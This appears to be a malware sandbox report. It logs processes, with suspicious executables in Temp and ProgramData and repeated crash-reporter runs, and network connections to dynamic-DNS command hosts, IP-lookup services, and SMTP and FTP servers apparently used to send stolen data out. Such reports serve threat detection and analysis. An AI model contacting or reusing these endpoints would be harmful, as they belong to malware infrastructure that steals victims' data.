C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1928

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1964

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Program Files (x86)\ClocX\ClocX.exe

"C:\Program Files (x86)\ClocX\ClocX.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1896

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2008

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1992

Network

Country Destination Domain Proto
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.235:443 tcp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 126.177.238.8.in-addr.arpa udp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
US 131.253.33.200:443 www.bing.com tcp
US 8.8.8.8:53 200.33.253.131.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
NL 88.221.24.24:443 r.bing.com tcp
NL 88.221.24.24:443 r.bing.com tcp
NL 88.221.24.83:443 th.bing.com tcp
NL 88.221.24.83:443 th.bing.com tcp
US 8.8.8.8:53 24.24.221.88.in-addr.arpa udp
US 8.8.8.8:53 83.24.221.88.in-addr.arpa udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.76:443 login.microsoftonline.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
DE 172.217.23.214:443 i.ytimg.com tcp
US 8.8.8.8:53 110.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 214.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.46.80:443 services.bingapis.com tcp
US 8.8.8.8:53 80.46.107.13.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 datalake.abuse.ch udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 48.202.162.178.in-addr.arpa udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 6coinc.zapto.org udp
BG 91.92.244.198:6696 6coinc.zapto.org tcp
US 8.8.8.8:53 198.244.92.91.in-addr.arpa udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.212:443 api.ipify.org tcp
US 8.8.8.8:53 212.62.237.104.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
DE 195.201.255.35:443 195.201.255.35 tcp
DE 195.201.255.35:443 195.201.255.35 tcp
DE 195.201.255.35:443 195.201.255.35 tcp
US 8.8.8.8:53 35.255.201.195.in-addr.arpa udp
DE 195.201.255.35:443 195.201.255.35 tcp
DE 195.201.255.35:443 195.201.255.35 tcp
DE 195.201.255.35:443 195.201.255.35 tcp
DE 195.201.255.35:443 195.201.255.35 tcp
US 104.237.62.212:443 api.ipify.org tcp
US 8.8.8.8:53 mail.ezexpress.net udp
SG 172.96.191.121:587 mail.ezexpress.net tcp
US 8.8.8.8:53 121.191.96.172.in-addr.arpa udp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 22.71.37.193.in-addr.arpa udp
US 104.237.62.212:443 api.ipify.org tcp
US 104.237.62.212:443 api.ipify.org tcp
SG 172.96.191.121:587 mail.ezexpress.net tcp
RU 193.37.71.22:80 193.37.71.22 tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 mail.nmsltd.com.tr udp
TR 185.86.155.42:587 mail.nmsltd.com.tr tcp
US 8.8.8.8:53 42.155.86.185.in-addr.arpa udp
TR 185.86.155.42:587 mail.nmsltd.com.tr tcp
US 104.237.62.212:443 api.ipify.org tcp
US 8.8.8.8:53 smtp.privateemail.com udp
US 66.29.159.53:587 smtp.privateemail.com tcp
US 8.8.8.8:53 53.159.29.66.in-addr.arpa udp
US 8.8.8.8:53 ftp.ercolina-usa.com udp
US 192.254.225.136:21 ftp.ercolina-usa.com tcp
US 8.8.8.8:53 136.225.254.192.in-addr.arpa udp
US 192.254.225.136:36285 ftp.ercolina-usa.com tcp
US 66.29.159.53:587 smtp.privateemail.com tcp
US 192.254.225.136:35479 ftp.ercolina-usa.com tcp
US 192.254.225.136:40359 ftp.ercolina-usa.com tcp
US 192.254.225.136:41510 ftp.ercolina-usa.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 files.catbox.moe udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 37.20.181.108.in-addr.arpa udp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 188.114.96.0:443 reallyfreegeoip.org tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 73.247.226.132.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 varders.kozow.com udp
FR 51.38.247.67:8081 varders.kozow.com tcp
US 8.8.8.8:53 aborters.duckdns.org udp
FR 51.38.247.67:8081 aborters.duckdns.org tcp
